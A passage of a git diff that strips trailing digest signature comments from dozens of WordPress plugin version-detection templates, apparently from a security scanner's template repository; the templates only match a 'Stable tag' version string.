a/http/technologies/wordpress/plugins/host-webfonts-local.yaml +++ b/http/technologies/wordpress/plugins/host-webfonts-local.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022064641a87cb8718c67652a9ca995b72be3c041456e37602a7687563550f7bbb3a022100a2e2a9af2c279c79c9c0286596234c78c088bad6c7f232d5a75e7d992ac2a05a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/hostinger.yaml b/http/technologies/wordpress/plugins/hostinger.yaml index 97f4711415..5d3adf7c27 100644 --- a/http/technologies/wordpress/plugins/hostinger.yaml +++ b/http/technologies/wordpress/plugins/hostinger.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402207efd9e7bfb0acfa5749e28df8088f72e3e4eabc26bf38a859d68e74457f15f8902204336fd96d5ce14989b3cca07f1158a053578086c188837b63ded41ba7d1c6af5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/image-optimization.yaml b/http/technologies/wordpress/plugins/image-optimization.yaml index 0b7114dddd..4a68323ae1 100644 --- a/http/technologies/wordpress/plugins/image-optimization.yaml +++ b/http/technologies/wordpress/plugins/image-optimization.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100a77a4fe4619d6c2120cf3e2d389b9e494a2325f0940f948c8783c1d8f216dc2b022100858e61049f90507663c68960fd8f69a09b350a7e0fd9a00c05c68cc48befa04c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/imagify.yaml b/http/technologies/wordpress/plugins/imagify.yaml index e868fa2188..16dfc8df5f 100644 --- a/http/technologies/wordpress/plugins/imagify.yaml +++ b/http/technologies/wordpress/plugins/imagify.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220038630366e097298a5d6d93b99a8af68783ca1c277bc8ce28574793198fda8d302201a570c31d2248837eed5dc23bcfc6e00f1fb2bcd18c5601194d11fe120a07aa2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml index a0753ef7cc..2ccd4dbce8 100644 --- a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml +++ b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221009e318b1b6c0991bbd947aa871c8778b7e83cf8933fd549ffe260d3a68c7f4f6d022100cb109a50ef06b1a8d8e3d7b73dd0a3a63bb6cb589e151d947d812449297f8ec6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/instagram-feed.yaml b/http/technologies/wordpress/plugins/instagram-feed.yaml index 7ce9fa48b9..02ceb224d1 100644 --- a/http/technologies/wordpress/plugins/instagram-feed.yaml +++ b/http/technologies/wordpress/plugins/instagram-feed.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502204fd5e2d7c8359e1b955792e9ef8079fe659a66dc2f2e60a3273328dbbf834449022100a95944c5b6756ddfb09fdacec5592068e6279d6a844b69c1e34d6b594442b5b4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml index 6df357b5ca..367d587ce2 100644 --- a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100eff0c8732ef55f8e9c09566b4201702752455131ccf970741c2b5aa35ba092c702205d4bc96570d71343485319445008609ca287e88cf672daf7039787141d803125:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/jetpack-boost.yaml b/http/technologies/wordpress/plugins/jetpack-boost.yaml index 5779f6e6b1..feed730ee0 100644 --- a/http/technologies/wordpress/plugins/jetpack-boost.yaml +++ b/http/technologies/wordpress/plugins/jetpack-boost.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502202b7b78fe882ca5b159e67a9cf8863cfbff4868b2fec536cbea03982d454e5498022100c23e9e74383eb07f4e83393467b1b9bcbe44fbdea5e6a2b8fda277da30e6ea48:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/jetpack.yaml b/http/technologies/wordpress/plugins/jetpack.yaml index d720be2d04..9b2841e7ca 100644 --- a/http/technologies/wordpress/plugins/jetpack.yaml +++ b/http/technologies/wordpress/plugins/jetpack.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100a418024310bb8c18e5ecec901902078b02c7233e70314525f2d11ecf0086298a0221008ebe4efc28e24170ef2dddf7e9279d82c5c0b3a4835e55ba3c702ca20f94ee52:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/kadence-blocks.yaml b/http/technologies/wordpress/plugins/kadence-blocks.yaml index a9c1c4d059..42be14c5df 100644 --- a/http/technologies/wordpress/plugins/kadence-blocks.yaml +++ b/http/technologies/wordpress/plugins/kadence-blocks.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100ff7ed1ad2002dfafe5888052a1e0651441fcda96056cc418a17088f57c785546022100d69e71798d195a2ad7e6ab09eeac8f58e116876cbedaf7820001dd2f6d472030:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/kirki.yaml b/http/technologies/wordpress/plugins/kirki.yaml index 74768680ce..4e0cd86c3f 100644 --- a/http/technologies/wordpress/plugins/kirki.yaml +++ b/http/technologies/wordpress/plugins/kirki.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402201e246659417a58f5ba851c7d1f6b36e1a89fc7be2a5060a5f0835c8067eb372f022057bc4d0252aec95cb8e484ccc376e7ea67d1df7f9eaa0fc3970a9d078a9c8788:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/leadin.yaml b/http/technologies/wordpress/plugins/leadin.yaml index d958f30064..59eadc5e6e 100644 --- a/http/technologies/wordpress/plugins/leadin.yaml +++ b/http/technologies/wordpress/plugins/leadin.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022057eba472cfb34a7ef27cbfd12eb15d574c794f65fb088aacbc83999577c4ce480220679baaaff9f9dd10f0f2660fd0f71bcdd32ed5c41a99bc2f4553232caf5fd413:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml index 39924b1971..41f7a0075e 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100ddf5b49dff3e65d3f90a098c2251eb2e416039fafcfc69c3a30ac241b16b9b39022051814849615edddfb1cfb45f87127d63f9deab3f52a9d734d815120e74716ad2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/limit-login-attempts.yaml b/http/technologies/wordpress/plugins/limit-login-attempts.yaml index 90f8e6dc1d..7e35a3fb4f 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502203a0ea34d9ea77c178ce62205681f5053057a4255f8185e211887585d1de7e01202210090f44887df5372d8fbde5e906b6ba8377cbfccfad2e39716436845bfd80f9b2c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/litespeed-cache.yaml b/http/technologies/wordpress/plugins/litespeed-cache.yaml index d9d44aa94d..18c2a7586e 100644 --- a/http/technologies/wordpress/plugins/litespeed-cache.yaml +++ b/http/technologies/wordpress/plugins/litespeed-cache.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100a46de3e0830fb9f069ab720b71332cbf034511f0ef378b9f22a467d68dd8d9d7022100d57f9ddaf49a4026da321c8f3ac34f3b50592017eef0fa7cf284732a1e7c818b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/loco-translate.yaml b/http/technologies/wordpress/plugins/loco-translate.yaml index 184f2e90ae..6bc2aa78f9 100644 --- a/http/technologies/wordpress/plugins/loco-translate.yaml +++ b/http/technologies/wordpress/plugins/loco-translate.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100ae323dd97853e1c9c2949aa721fcf29fdf5ed1d5d03a01f55412a5a0f9b15576022100b01105ef6e1c910e7428532522d5aab28a9403489a76b8cd6509ba36552e5ffd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/loginizer.yaml b/http/technologies/wordpress/plugins/loginizer.yaml index 4e4d0fcbda..a43d3352a2 100644 --- a/http/technologies/wordpress/plugins/loginizer.yaml +++ b/http/technologies/wordpress/plugins/loginizer.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100c83d99a45eaf8d437d0837da77d97ba7682a8a7f5d5238f2655567e69688e81802203e16a26499d612779ca180c59d7f3d60cfee01f84369513e3383cc4c21ec1b9c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml index ec960fd849..e7db9944e4 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502210096f174f76ef1bcd2da83f1b788bf470fdb862af2fdd483383796aedc98f0967c022063eff641ed92715c0d18fc05e323b59649c707e478df6b14555880e7367ccbc4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml index 0d6e5b7d79..268bd7b9df 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402202c446df8706f6f366ec9d3b8edde887cbdc25c181986b5d23763b34e580f8c530220508b0891979e18eda07b2c51f07633a1f5c84cf6917001db10c6d402887a2b5b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailpoet.yaml b/http/technologies/wordpress/plugins/mailpoet.yaml index 884b95da21..ed3161d27c 100644 --- a/http/technologies/wordpress/plugins/mailpoet.yaml +++ b/http/technologies/wordpress/plugins/mailpoet.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220564515ac7c87581614e3fdabc602e319761fbc735a683cc1ca070d95889f994c0221009fef17a013e5e08d51333243a80c51f969c530291d69b71f0c54ac0744e88e6e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/maintenance.yaml b/http/technologies/wordpress/plugins/maintenance.yaml index f7e315c74e..a1641d4632 100644 --- a/http/technologies/wordpress/plugins/maintenance.yaml +++ b/http/technologies/wordpress/plugins/maintenance.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402207dbd9e1910eaef735d94efbdcf1ded68a847e27f645189115bac7e2d05b43f01022030233cca7feaeb7b149e90677e85ef02ea2cd75fa00de0c73adafc48e94641e3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mainwp-child.yaml b/http/technologies/wordpress/plugins/mainwp-child.yaml index 7a0ce276ea..3b6542683c 100644 --- a/http/technologies/wordpress/plugins/mainwp-child.yaml +++ b/http/technologies/wordpress/plugins/mainwp-child.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502202e7cd2c28440c5a0edd405e8431024a36c973e8824ef45764c75a4c7386b0a7602210088a1327e9ad26691a73c32e33af1d74d920291d37e4a5f67ec057c58e365d874:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/malcare-security.yaml b/http/technologies/wordpress/plugins/malcare-security.yaml index 1147fe3a42..969c280ee1 100644 --- a/http/technologies/wordpress/plugins/malcare-security.yaml +++ b/http/technologies/wordpress/plugins/malcare-security.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221008381c122bacfc0c52df612ea80c47350df6e039981fce89dec7119fef00737ed02207f0b700172502d1b41c1c6426bae73a6814963cfa29191d4bc19f048e6d1017f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/megamenu.yaml b/http/technologies/wordpress/plugins/megamenu.yaml index f191b9a266..1c97c422e4 100644 --- a/http/technologies/wordpress/plugins/megamenu.yaml +++ b/http/technologies/wordpress/plugins/megamenu.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022072e5aead3efbbdc44f19b5535eb200ec763a8a00cbea60261cc233e2abb03be802203104c78a61c353f1d4aa12f946f6d6390557fd2aa18136d65769b3f51541e771:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/members.yaml b/http/technologies/wordpress/plugins/members.yaml index 751cdf6db5..7d861cf06a 100644 --- a/http/technologies/wordpress/plugins/members.yaml +++ b/http/technologies/wordpress/plugins/members.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402207a5eb6c7f69f736da403c561a95fdd549fd00a87a73cd20c671d683dc208386002204a7c7405e169810a65673cff3826d0814f2e4ac1325f7214b78ec32041b9f32f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/meta-box.yaml b/http/technologies/wordpress/plugins/meta-box.yaml index 7597ae14c6..540d535ecc 100644 --- a/http/technologies/wordpress/plugins/meta-box.yaml +++ b/http/technologies/wordpress/plugins/meta-box.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221009dfa0156fae439612660c081c423c236091435c927ca0c14da32b1f2c8a1eca4022100aa36de29e76bafa20d64a909f9738504847e2e9299067a95d770abe495fd0a1e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/metform.yaml b/http/technologies/wordpress/plugins/metform.yaml index d96504c4e3..f089ee37d3 100644 --- a/http/technologies/wordpress/plugins/metform.yaml +++ b/http/technologies/wordpress/plugins/metform.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220103b96f4f9b25ec4a6dbd82ceb27051a0e6363727e241498f7607c6264c460fe022100c4fb18325d5e7d9f786057613a247255abea07e953f4081968bbdb1b342c0d91:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ml-slider.yaml b/http/technologies/wordpress/plugins/ml-slider.yaml index f758507515..d69709b8f9 100644 --- a/http/technologies/wordpress/plugins/ml-slider.yaml +++ b/http/technologies/wordpress/plugins/ml-slider.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100b81363bae0dac13ca46cf397fe212b47d46a6ca8770ae9194f1836b4a4ec67a7022100ca37ac607ce9598222ec7f0863982e4843fcf8f69277c377008b707fb12807e1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/newsletter.yaml b/http/technologies/wordpress/plugins/newsletter.yaml index 43b0100e0f..f8903fa3db 100644 --- a/http/technologies/wordpress/plugins/newsletter.yaml +++ b/http/technologies/wordpress/plugins/newsletter.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100ae5ea42b5afff66ef6f53eff0b251ef1e5655f4f63e087dfdc0c51afd7b1fe2a022064181a2cf4a666cbf8d97226cbde3eb3fc354ea4066abd11017527f83a9ad5ea:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml index 693673e77e..ae2451ca38 100644 --- a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml +++ b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022047f2be156ea482fbfd2daf7a3211df03e2b903caee0acec1742ea9e3086fc4bf022100d3160d79d0cc82f4991ed29fdfc81ff7304525ee95fdaa3a9a44187d031da839:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/nextgen-gallery.yaml b/http/technologies/wordpress/plugins/nextgen-gallery.yaml index 02b1182e2f..dcc61d1255 100644 --- a/http/technologies/wordpress/plugins/nextgen-gallery.yaml +++ b/http/technologies/wordpress/plugins/nextgen-gallery.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100e53de881ab7f932a84b5cb16cf9bebde39cbfb36eac5c1daccb4893897b6e8290220020c6844894c40d8ad0f8efdf617127a0942dfdd2e0adbc357d8cbe3c1f1d6cc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ninja-forms.yaml b/http/technologies/wordpress/plugins/ninja-forms.yaml index a47cf26c37..d1d2c1c1d0 100644 --- a/http/technologies/wordpress/plugins/ninja-forms.yaml +++ b/http/technologies/wordpress/plugins/ninja-forms.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220206114c6790e05205a788fb90daefab710b84d76b7155e96167e9fc49fccbcf7022100e937bbc5070e7a2cad5caad7b6ba077af9455059944f223535e79c076e1aae6c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ocean-extra.yaml b/http/technologies/wordpress/plugins/ocean-extra.yaml index 07e82cbc30..59a655c424 100644 --- a/http/technologies/wordpress/plugins/ocean-extra.yaml +++ b/http/technologies/wordpress/plugins/ocean-extra.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220268204d0963f43aeeb488904a917cd171c1613ceceafa8818b87aecf2bc505ab022100ddae2d130e0d0ec4214ac40362171fd69d32a942794319e7fa1d5c324f2d5646:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml index deabafef8c..d15634bb2b 100644 --- a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml +++ b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100cdce90056e83b298b2f22a54b01d61493f9098008ef51e143894c941c837ba7a022100e40228596677994979533a8e3873578ffba6d0b6d6a67366351cb91f16f819c9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/one-click-demo-import.yaml b/http/technologies/wordpress/plugins/one-click-demo-import.yaml index 21622d01c6..7da04be5d3 100644 --- a/http/technologies/wordpress/plugins/one-click-demo-import.yaml +++ b/http/technologies/wordpress/plugins/one-click-demo-import.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100cc2bb8941482ea96a51f69be558b8afdf833f57cf1524b78520c5655a183491d022100c3a536098d44b2d53848143f4b23bcfe3821014b63d947b513f27a731198690e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/optinmonster.yaml b/http/technologies/wordpress/plugins/optinmonster.yaml index 77c54e975a..a79253cec5 100644 --- a/http/technologies/wordpress/plugins/optinmonster.yaml +++ b/http/technologies/wordpress/plugins/optinmonster.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502205d8f846fc29013280f6de8ee077e7f4d40a3b02af9bce134a955e5b578bb79d7022100da6931cfa77e3e0b0acb3f70bf39b15da416d838d3b811eb840ceaeccf7bb7ea:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/otter-blocks.yaml b/http/technologies/wordpress/plugins/otter-blocks.yaml index ea12128afc..77fc04a220 100644 --- a/http/technologies/wordpress/plugins/otter-blocks.yaml +++ b/http/technologies/wordpress/plugins/otter-blocks.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402206357be35265bc58da7b8513c99f4fc403dadcb0b2e4a8467807bd30944e7458d0220044dcafb8273dcd00b2418622891815f25bcbecad97118e72f3b60567148741e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/password-protected.yaml b/http/technologies/wordpress/plugins/password-protected.yaml index da0907edc2..733f9ee453 100644 --- a/http/technologies/wordpress/plugins/password-protected.yaml +++ b/http/technologies/wordpress/plugins/password-protected.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100dcd8dc73de32b95592bd6461bbac45ae3722312c891d1388c824cf498b49ac8e022100d86916d7860a9e5bf7db94b4406434338c3aa02040564107a9457fdb73e20c4e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pdf-embedder.yaml b/http/technologies/wordpress/plugins/pdf-embedder.yaml index dc2990b4bc..0af08f0ac0 100644 --- a/http/technologies/wordpress/plugins/pdf-embedder.yaml +++ b/http/technologies/wordpress/plugins/pdf-embedder.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502200ab079f19f28b2073022b62543a5f88a7e76812acee448be592d6f2c48d2e95d022100aa858048af3c40cb3e21917a516a132e8ba14f5f0bc6ce9f5e170bb61a4c350f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml index 5ad7d22cf5..1e4c77fbca 100644 --- a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100d231d1494b2ddeae0371f622f52767241928f13da295b3ff5e6722de3d2a9c5c022100fa44daec618280895b6f5434860267df1cf3084624ca4b174b0d360417861078:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pixelyoursite.yaml b/http/technologies/wordpress/plugins/pixelyoursite.yaml index bcca1f0e73..295e3fe82d 100644 --- a/http/technologies/wordpress/plugins/pixelyoursite.yaml +++ b/http/technologies/wordpress/plugins/pixelyoursite.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502203df3f0a3febb9843dbcc673e0c4f7b6fe5027a5a78580093c2b503c85ed26a8002210081c7886f9dc3908ec5a3b15ca6400cbb733092a582b817d4083173345eb5cc2e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/polylang.yaml b/http/technologies/wordpress/plugins/polylang.yaml index 7c9f890054..862f73201f 100644 --- a/http/technologies/wordpress/plugins/polylang.yaml +++ b/http/technologies/wordpress/plugins/polylang.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022042baf1831b137aa5d60ef77668b8f081e61410c6d4e89a27237f8c832c8dfc47022100c2d3073dda0817fef080112a0ec472195babf3d8a03f204e0e808be3e43998e0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/popup-maker.yaml b/http/technologies/wordpress/plugins/popup-maker.yaml index 33be0438c8..711b64f9d0 100644 --- a/http/technologies/wordpress/plugins/popup-maker.yaml +++ b/http/technologies/wordpress/plugins/popup-maker.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100a9d520e228b76e3bd228c75460de73bfe10d1d79823fc360ab6a20415203bfe202200d861adb2fff5aa3601d2d37dc5635759eb2e6111e0d4a65f5f01d7f1b028ce8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/post-smtp.yaml b/http/technologies/wordpress/plugins/post-smtp.yaml index 5fc5700064..58ddcfab78 100644 --- a/http/technologies/wordpress/plugins/post-smtp.yaml +++ b/http/technologies/wordpress/plugins/post-smtp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100eab9f385c2f95fa917e810b1a6d364acf986c26ebbcf63cd52f5931bf16b0533022100f49457c48630af26bad99e0f61f0d5a892f32aaec368d57debbd743ab82048a1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/post-types-order.yaml b/http/technologies/wordpress/plugins/post-types-order.yaml index 9b3d3fc5c8..305d74e8ea 100644 --- a/http/technologies/wordpress/plugins/post-types-order.yaml +++ b/http/technologies/wordpress/plugins/post-types-order.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100a2a1d7cbea0b605cc24a23180ebdae3adf1752e414401fde71522c228f391d8202202984b7c985de0d3f87b3c6f158c4fe894c2574103fa67a328cb2cbfa98ecea4f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml index b8c8348ad1..668162fc4e 100644 --- a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220273d92f83b09ea4a668838a70414eb5988f6cd3a09e845ea9da96a3cf7310d8a022100d2a8e19a5c44451305caefc72a42e57ac7557b4beaaa7689f292cfdb9fadda18:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pretty-link.yaml b/http/technologies/wordpress/plugins/pretty-link.yaml index 742a94ec68..4f99876557 100644 --- a/http/technologies/wordpress/plugins/pretty-link.yaml +++ b/http/technologies/wordpress/plugins/pretty-link.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402200f306bace7f969e974e16f5acde4385e00bc1f0967494aec153fa8fba3c54e2702205e8e61bec50d044b98302b65d8c045a6b00ec15b0957549052448ee5396a5482:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/really-simple-captcha.yaml b/http/technologies/wordpress/plugins/really-simple-captcha.yaml index a732a0a87c..a0d2554492 100644 --- a/http/technologies/wordpress/plugins/really-simple-captcha.yaml +++ b/http/technologies/wordpress/plugins/really-simple-captcha.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502207629ff2dc032ccfba4e7d91d73a6d5462e23b54d7b0c55fd112f72e6484b19f6022100e3bf8fd4f56de4140cc0a29db44b85f41a03cf7192bc712f15736f5829f31c01:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git 